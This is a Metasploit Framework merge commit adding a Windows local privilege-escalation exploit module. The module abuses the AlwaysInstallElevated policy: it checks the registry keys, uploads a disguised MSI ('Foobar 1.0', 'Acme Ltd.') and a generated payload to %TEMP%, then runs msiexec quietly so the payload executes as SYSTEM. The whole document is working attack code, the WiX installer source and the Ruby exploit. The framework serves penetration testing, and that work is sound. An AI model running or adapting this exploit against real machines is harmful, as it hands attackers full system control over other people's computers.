Merge branch 'msi_elevated' of https://github.com/Meatballs1/metasploit-framework into Meatballs1-msi_elevated

jvazquez-r7 · jvazquez-r7 · commit fd1557b6d2da · 2012-11-28T21:49:36.000+01:00
diff --git a/external/source/exploits/exec_payload_msi/exec_payload.wxs b/external/source/exploits/exec_payload_msi/exec_payload.wxs
@@ -0,0 +1,29 @@
+<?xml version='1.0' encoding='windows-1252'?>
+<Wix xmlns='http://schemas.microsoft.com/wix/2006/wi'>
+  <Product Name='Foobar 1.0' Id='*' 
+    Language='1033' Codepage='1252' Version='1.0.0' Manufacturer='Acme Ltd.'>
+
+	<Package InstallerVersion="100" Languages="0" Manufacturer="Acme Ltd." ReadOnly="no" />	
+	
+	<Media Id='1' Cabinet='product.cab' EmbedCab='yes' />
+
+	<Directory Id='TARGETDIR' Name='SourceDir'>
+	   <Component Id='MyComponent' Guid='12345678-1234-1234-1234-123456789012'>
+		  <Condition>0</Condition>
+	   </Component>		
+	</Directory>
+	
+	<!-- Execute must be deferred and Impersonate no to run as a higher privilege level -->
+	<CustomAction Id='ExecNotepad' Directory='TARGETDIR' Impersonate='no' Execute='deferred' ExeCommand='[SourceDir]payload.exe' Return='asyncNoWait'/>
+
+    <Feature Id='Complete' Level='1'>
+		<ComponentRef Id='MyComponent' />
+    </Feature>
+	
+	<InstallExecuteSequence>
+		<ResolveSource After="CostInitialize" />
+		<Custom Action="ExecNotepad" After="InstallInitialize" />
+	</InstallExecuteSequence>
+
+  </Product>
+</Wix>
diff --git a/modules/exploits/windows/local/always_install_elevated.rb b/modules/exploits/windows/local/always_install_elevated.rb
@@ -0,0 +1,174 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/post/windows/registry'
+require 'msf/core/post/common'
+require 'msf/core/post/file'
+
+class Metasploit3 < Msf::Exploit::Local
+	Rank = AverageRanking
+
+	include Msf::Exploit::EXE
+	include Msf::Post::Common
+	include Msf::Post::File
+	include Msf::Post::Windows::Registry
+
+	def initialize(info={})
+		super(update_info(info, {
+			'Name'          => 'Windows AlwaysInstallElevated MSI',
+			'Description'    => %q{
+				This module checks the AlwaysInstallElevated registry keys which
+				dictate if .MSI files should be installed with elevated privileges
+				(NT AUTHORITY\SYSTEM).
+
+				The default MSI file is data/exploits/exec_payload.msi with the WiX source
+				file under external/source/exploits/exec_payload_msi/exec_payload.wxs.
+				This MSI simply executes payload.exe within the same folder.
+
+				The MSI may not execute succesfully successive times, but may be able to
+				get around this by regenerating the MSI.
+
+				MSI can be rebuilt from the source using the WIX tool with the following commands:
+				candle exec_payload.wxs
+				light exec_payload.wixobj
+			},
+			'License'       => MSF_LICENSE,
+			'Author'        =>
+				[
+					'Ben Campbell',
+					'Parvez Anwar' # discovery?/inspiration
+				],
+			'Arch'          => [ ARCH_X86, ARCH_X86_64 ],
+			'Platform'      => [ 'win' ],
+			'SessionTypes'  => [ 'meterpreter' ],
+			'DefaultOptions' =>
+				{
+					'WfsDelay' => 10,
+					'EXITFUNC' => 'thread',
+					'InitialAutoRunScript' => 'migrate -k -f'
+				},
+			'Targets'       =>
+				[
+					[ 'Windows', { } ],
+				],
+			'References'    =>
+				[
+					[ 'URL', 'http://www.greyhathacker.net/?p=185' ],
+					[ 'URL', 'http://msdn.microsoft.com/en-us/library/aa367561(VS.85).aspx' ],
+					[ 'URL', 'http://wix.sourceforge.net'] ,
+				],
+			'DisclosureDate'=> 'Mar 18 2010',
+			'DefaultTarget' => 0
+		}))
+
+		register_advanced_options([
+			OptString.new('LOG_FILE', [false, 'Remote path to output MSI log file to.', nil]),
+			OptBool.new('QUIET', [true, 'Run the MSI with the /quiet flag.', true])
+		], self.class)
+	end
+
+	def check
+		install_elevated = "AlwaysInstallElevated"
+		installer = "SOFTWARE\\Policies\\Microsoft\\Windows\\Installer"
+		hkcu = "HKEY_CURRENT_USER\\#{installer}"
+		hklm = "HKEY_LOCAL_MACHINE\\#{installer}"
+
+		local_machine_value = registry_getvaldata(hklm,install_elevated)
+
+		if local_machine_value.nil?
+			print_error("#{hklm}\\#{install_elevated} does not exist or is not accessible.")
+			return Msf::Exploit::CheckCode::Safe
+		elsif local_machine_value == 0
+			print_error("#{hklm}\\#{install_elevated} is #{local_machine_value}.")
+			return Msf::Exploit::CheckCode::Safe
+		else
+			print_good("#{hklm}\\#{install_elevated} is #{local_machine_value}.")
+			current_user_value = registry_getvaldata(hkcu,install_elevated)
+
+			if current_user_value.nil?
+				print_error("#{hkcu}\\#{install_elevated} does not exist or is not accessible.")
+				return Msf::Exploit::CheckCode::Safe
+			elsif current_user_value == 0
+				print_error("#{hkcu}\\#{install_elevated} is #{current_user_value}.")
+				return Msf::Exploit::CheckCode::Safe
+			else
+				print_good("#{hkcu}\\#{install_elevated} is #{current_user_value}.")
+				return Msf::Exploit::CheckCode::Vulnerable
+			end
+		end
+	end
+
+	def cleanup
+		if @executed
+			begin
+				print_status("Deleting MSI...")
+				file_rm(@msi_destination)
+			rescue Rex::Post::Meterpreter::RequestError => e
+				print_error(e.to_s)
+				print_error("Failed to delete MSI #{@msi_destination}, manual cleanup may be required.")
+			end
+
+			begin
+				print_status("Deleting Payload...")
+				file_rm(@payload_destination)
+			rescue Rex::Post::Meterpreter::RequestError => e
+				print_error(e.to_s)
+				print_error("Failed to delete payload #{@payload_destination}, this is expected if the exploit is successful, manual cleanup may be required.")
+			end
+		end
+	end
+
+	def exploit
+		@executed = false
+		if check == Msf::Exploit::CheckCode::Vulnerable
+			@executed = true
+
+			msi_filename = "exec_payload.msi" # Rex::Text.rand_text_alpha((rand(8)+6)) + ".msi"
+			msi_source = ::File.join(Msf::Config.install_root, "data", "exploits", "exec_payload.msi")
+
+			# Upload MSI
+			@msi_destination = expand_path("%TEMP%\\#{msi_filename}").strip # expand_path in Windows Shell adds a newline and has to be stripped
+			print_status("Uploading the MSI to #{@msi_destination} ...")
+
+			#upload_file - ::File.read doesn't appear to work in windows...
+			source = File.open(msi_source, "rb"){|fd| fd.read(fd.stat.size) }
+			write_file(@msi_destination, source)
+
+			# Upload payload
+			payload = generate_payload_exe
+			@payload_destination = expand_path("%TEMP%\\payload.exe").strip
+			print_status("Uploading the Payload to #{@payload_destination} ...")
+			write_file(@payload_destination, payload)
+
+			# Execute MSI
+			print_status("Executing MSI...")
+
+			if datastore['LOG_FILE'].nil?
+				logging = ""
+			else
+				logging = "/l* #{datastore['LOG_FILE']} "
+			end
+
+			if datastore['QUIET']
+				quiet = "/quiet "
+			else
+				quiet = ""
+			end
+
+			cmd = "msiexec.exe #{logging}#{quiet}/package #{@msi_destination}"
+			vprint_status("Executing: #{cmd}")
+			begin
+				result = cmd_exec(cmd)
+			rescue Rex::TimeoutError
+				vprint_status("Execution timed out.")
+			end
+			vprint_status("MSI command-line feedback: #{result}")
+		end
+	end
+end
